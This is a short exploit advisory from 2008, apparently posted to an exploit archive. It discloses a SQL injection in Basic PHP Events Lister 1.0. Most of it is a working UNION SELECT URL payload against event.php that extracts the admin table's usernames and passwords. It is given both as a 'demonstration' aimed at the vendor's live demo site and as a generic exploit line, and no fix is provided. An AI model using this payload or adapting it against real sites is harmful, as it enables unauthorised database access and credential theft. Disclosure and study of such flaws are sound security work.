Basic PHP Events Lister 1.0 Remote SQL Injection Vulnerability

2008-09-21 21:01:03

_____ ____ _____
/ _ \ /\ /\ / _ \ / _ \
| | | | \ \/ / ||_| | | | | |
| | | | \ / \_ | | | | |
| |_| | / \ __\ | | |_| |
\_____/ / /\ \ |____/ \_____/
\/ \/

[~] Basic PHP Events Lister Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: Basic PHP Events Lister

[~] site: http://www.mevin.com

[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip

[~] Vulnerability Class: SQL Injection

[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--



[~] Exploit:

http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.